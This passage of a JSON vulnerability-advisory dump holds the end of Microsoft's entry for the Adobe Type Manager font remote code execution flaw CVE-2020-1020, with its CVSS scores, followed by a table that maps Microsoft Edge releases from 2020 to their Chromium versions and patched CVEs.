Adobe Type 1 PostScript format.\n\nFor all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nThe update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mscve", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-1020", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-03T16:29:41", "description": "**Please note:** Starting 1/21/2021, we will be releasing the Chrome CVEs that are included in the new releases of Microsoft Edge (Chromium-based) directly in the Security Update Guide. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\nThis advisory will be updated whenever Microsoft releases a version of Microsoft Edge (Chromium-based) which incorporates publicly disclosed security updates from the Chromium project. Microsoft will document separately any vulnerabilities in Microsoft Edge (Chromium-based), that are not in Chromium, under a Microsoft-assigned CVE number (see, for example: [CVE-2020-1341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/cve-2020-1341>)).\n\n**History of Microsoft Edge (Chromium-based) Security Updates**\n\nMicrosoft Edge Version | Date Released | Based on Chromium Version | Highest Severity Fix in Release | CVEs \n---|---|---|---|--- \n87.0.664.75 | 1/7/2021 | 87.0.4280.141 | High | [CVE-2021-21106](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21106>), [CVE-2021-21107](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21107>), [CVE-2021-21108](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21108>), [CVE-2021-21109](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21109>), [CVE-2021-21110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21110>), [CVE-2021-21111](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21111>), [CVE-2021-21112](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21112>), [CVE-2021-21113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21113>), [CVE-2021-21114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21114>), [CVE-2021-21115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21115>), [CVE-2021-21116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21116>), [CVE-2020-16043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16043>), [CVE-2020-15995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15995>) \n87.0.664.57 | 12/7/2020 | 87.0.4280.88 | High | [CVE-2020-16037](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16037>), [CVE-2020-16038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16038>), [CVE-2020-16039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16039>), [CVE-2020-16040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040>), [CVE-2020-16041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16041>), [CVE-2020-16042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16042>) \n87.0.664.41 | 11/19/2020 | 87.0.4280.66 for Windows and Linux, 87.0.4280.67 for Mac | High | [CVE-2019-8075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8075>), [CVE-2020-16012](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16012>), [CVE-2020-16014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16014>), [CVE-2020-16015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16015>), [CVE-2020-16018](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16018>), [CVE-2020-16022](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16022>), [CVE-2020-16023](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16023>), [CVE-2020-16024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16024>), [CVE-2020-16025](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16025>), [CVE-2020-16026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16026>), [CVE-2020-16027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16027>), [CVE-2020-16028](<https://cve.mitre.org/ci-bin/cvename.cgi?name=CVE-2020-16028>), [CVE-2020-16029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16029>), [CVE-2020-16030](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16030>), [CVE-2020-16031](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16031>), [CVE-2020-16032](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16032>), [CVE-2020-16033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16033>), [CVE-2020-16034](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16034>), [CVE-2020-16036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16036>) \n86.0.622.69 | 11/13/2020 | 86.0.4240.198 | High | [**CVE-2020-16013**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013>) *, [**CVE-2020-16017**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017>) * \n86.0.622.68 | 11/11/2020 | 86.0.4240.193 | High | [CVE-2020-16016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16016>) \n86.0.622.63 | 11/4/2020 | 86.0.4240.183 | High | [CVE-2020-16004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16004>), [CVE-2020-16005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16005>), [CVE-2020-16006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16006>), [CVE-2020-16007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16007>), [CVE-2020-16008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16008>), [**CVE-2020-16009**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009>) *, [CVE-2020-16011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16011>) \n86.0.622.51 | 10/22/2020 | 86.0.4240.111 | High | [**CVE-2020-15999**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999>) *, [CVE-2020-16000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16000>), [CVE-2020-16001](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16001>), [CVE-2020-16002](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16002>), [CVE-2020-16003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16003>) \n86.0.622.38 | 10/8/2020 | 86.0.4240.75 | High | [CVE-2020-6557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6557>), [CVE-2020-15968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15968>), [CVE-2020-15969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15969>), [CVE-2020-15971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15971>), [CVE-2020-15972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15972>), [CVE-2020-15973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15973>), [CVE-2020-15974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15974>), [CVE-2020-15975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15975>), [CVE-2020-15977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15977>), [CVE-2020-15979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15979>), [CVE-2020-15981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15981>), [CVE-2020-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15982>), [CVE-2020-15985](<https://cve.mitre.org/cgi-bin/cvenamecgi?name=CVE-2020-15985>), [CVE-2020-15987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15987>), [CVE-2020-15988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15988>), [CVE-2020-15989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15989>), [CVE-2020-15990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15990>), [CVE-2020-15991](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15991>), [CVE-2020-15992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15992>) \n85.0.564.63 | 9/23/2020 | 85.0.4183.121 | High | [CVE-2020-15960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15960>), [CVE-2020-15961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15961>), [CVE-2020-15962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15962>), [CVE-2020-15963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15963>), [CVE-2020-15964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15964>), [CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>), [CVE-2020-15966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15966>) \n85.0.564.51 | 9/9/2020 | 85.0.4183.102 | High | [CVE-2020-6574](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6574>), [CVE-2020-6575](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6575>), [CVE-2020-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6576>), [CVE-2020-15959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15959>) \n85.0.564.41 | 8/27/2020 | 85.0.4183.83 | High | [CVE-2020-6558](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6558>), [CVE-2020-6559](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6559>), [CVE-2020-6560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6560>), [CVE-2020-6561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6561>), [CVE-2020-6562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6562>), [CVE-2020-6563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6563>), [CVE-2020-6564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6564>), [CVE-2020-6566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6566>), [CVE-2020-6567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6567>), [CVE-2020-6568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6568>), [CVE-2020-6569](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6569>), [CVE-2020-6570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6570>), [CVE-2020-6571](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6571>) \n84.0.522.63 | 8/20/2020 | 84.0.4147.135 | High | [CVE-2020-6556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6556>) \n84.0.522.59 | 8/11/2020 | 84.0.4147.125 | High | [CVE-2020-6542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6542>), [CVE-2020-6543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6543>), [CVE-2020-6544](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6544>), [CVE-2020-6545](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6545>), [CVE-2020-6546](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6546>), [CVE-2020-6547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6547>), [CVE-2020-6548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6548>), [CVE-2020-6549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6549>), [CVE-2020-6550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6550>), [CVE-2020-6551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6551>), [CVE-2020-6552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6552>), [CVE-2020-6553](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6553>), [CVE-2020-6554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6554>), [CVE-2020-6555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6555>) \n84.0.522.49 | 7/30/2020 | 84.0.4147.105 | High | [CVE-2020-6532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6532>), [CVE-2020-6537](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6537>), [CVE-2020-6538](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6538>), [CVE-2020-6539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6539>), [CVE-2020-6540](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6540>), [CVE-2020-6541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6541>) \n84.0.522.40 | 7/16/2020 | 84.0.4147.89 | Critical | [CVE-2020-6510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6510>), [CVE-2020-6511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6511>), [CVE-2020-6512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6512>), [CVE-2020-6513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6513>), [CVE-2020-6514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6514>), [CVE-2020-6515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6515>), [CVE-2020-6516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516>), [CVE-2020-6517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6517>), [CVE-2020-6518](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6518>), [CVE-2020-6519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6519>), [CVE-2020-6520](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6520>), [CVE-2020-6521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6521>), [CVE-2020-6522](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6522>), [CVE-2020-6523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6523>), [CVE-2020-6524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6524>), [CVE-2020-6525](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6525>), [CVE-2020-6526](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6526>), [CVE-2020-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6527>), [CVE-2020-6528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6528>), [CVE-2020-6529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6529>), [CVE-2020-6530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6530>), [CVE-2020-6531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6531>), [CVE-2020-6533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6533>), [CVE-2020-6534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6534>), [CVE-2020-6535](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6535>), [CVE-2020-6536](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6536>) \n83.0.478.56 | 6/24/2020 | 83.0.4103.116 | High | [CVE-2020-6509](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6509>) \n83.0.478.53 | 6/17/2020 | 83.0.4103.106 | High | [CVE-2020-6505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6505>), [CVE-2020-6506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6506>), [CVE-2020-6507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6507>) \n83.0.478.45 | 6/4/2020 | 83.0.4103.97 | High | [CVE-2020-6493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6493>), [CVE-2020-6494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6494>), [CVE-2020-6495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6495>), [CVE-2020-6496](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6496>) \n83.0.478.37 | 5/21/2020 | 83.0.4103.61 | High | [CVE-2020-6465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6465>), [CVE-2020-6466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6466>), [CVE-2020-6467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6467>), [CVE-2020-6468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6468>), [CVE-2020-6469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6469>), [CVE-2020-6470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6470>), [CVE-2020-6471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6471>), [CVE-2020-6472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6472>), [CVE-2020-6473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6473>), [CVE-2020-6474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6474>), [CVE-2020-6475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6475>), [CVE-2020-6476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6476>), [CVE-2020-6478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6478>), [CVE-2020-6479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6479>), [CVE-2020-6480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6480>), [CVE-2020-6481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6481>), [CVE-2020-6482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6482>), [CVE-2020-6483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6483>), [CVE-2020-6484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6484>), [CVE-2020-6486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6486>), [CVE-2020-6487](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6487>), [CVE-2020-6488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6488>), [CVE-2020-6489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6489>), [CVE-2020-6490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-640>) \n81.0.416.72 | 5/7/2020 | 81.0.4044.138 | High | [CVE-2020-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6831>), [CVE-2020-6464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6464>) \n81.0.416.68 | 4/29/2020 | 81.0.4044.129 | High | [CVE-2020-6461](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6461>), [CVE-2020-6462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6462>) \n81.0.416.64 | 4/23/2020 | 81.0.4044.122 | High | [CVE-2020-6458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6458>), [CVE-2020-6459](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6459>), [CVE-2020-6460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6460>) \n81.0.416.58 | 4/17/2020 | 81.0.4044.113 | Critical | [CVE-2020-6457](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6457>) \n81.0.416.53 | 4/13/2020 | 81.0.4044.92 | High | [CVE-2020-6454](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6454>), [CVE-2020-6423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6423>), [CVE-2020-6455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6455>), [CVE-2020-6430](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6430>), [CVE-2020-6456](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6456>), [CVE-2020-6431](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6431>), [CVE-2020-6432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6432>), [CVE-2020-6433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6433>), [CVE-2020-6434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6434>), [CVE-2020-6435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6435>), [CVE-2020-6436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6436>), [CVE-2020-6437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6437>), [CVE-2020-6438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6438>), [CVE-2020-6439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6439>), [CVE-2020-6440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6440>), [CVE-2020-6441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6441>), [CVE-2020-6442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6442>), [CVE-2020-6443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6443>), [CVE-2020-6444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6444>), [CVE-2020-6445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6445>), [CVE-2020-6446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6446>), [CVE-2020-6447](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6447>), [CVE-2020-6448](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6448>) \n80.0.361.109 | 4/1/2020 | 80.0.3987.162 | High | [CVE-2020-6450](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6450>), [CVE-2020-6451](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6451>), [CVE-2020-6452](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6452>) \n80.0.361.69 | 3/19/2020 | 80.0.3987.149 | High | [CVE-2020-6422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6422>), [CVE-2020-6424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6424>), [CVE-2020-6425](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6425>), [CVE-2020-6426](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6426>), [CVE-2020-6427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6427>), [CVE-2020-6428](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6428>), [CVE-2020-6429](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6429>), [CVE-2019-20503](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20503>), [CVE-2020-6449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6449>) \n80.0.361.66 | 3/4/2020 | 80.0.3987.132 | High | [CVE-2020-6420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6420>) \n80.0.361.62 | 2/25/2020 | 80.0.3987.122 | High | [CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>), [**CVE-2020-6418**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>) * \n80.0.361.57 | 2/20/2020 | 80.0.3987.116 | High | [CVE-2020-6383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6383>), [CVE-2020-6384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6384>), [CVE-2020-6386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6386>) \n80.0.361.48 | 2/7/2020 | 80.0.3987.87 | High | [CVE-2020-6381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6381>), [CVE-2020-6382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6382>), [CVE-2019-18197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18197>), [CVE-2019-19926](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19926>), [CVE-2020-6385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6385>), [CVE-2019-19880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19880>), [CVE-2019-19925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19925>), [CVE-2020-6387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6387>), [CVE-2020-6388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6388>), [CVE-2020-6389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6389>), [CVE-2020-6390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6390>), [CVE-2020-6391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6391>), [CVE-2020-6392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202-6392>), [CVE-2020-6393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6393>), [CVE-2020-6394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6394>), [CVE-2020-6395](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6395>), [CVE-2020-6396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6396>), [CVE-2020-6397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6397>), [CVE-2020-6398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6398>), [CVE-2020-6399](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6399>), [CVE-2020-6400](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6400>), 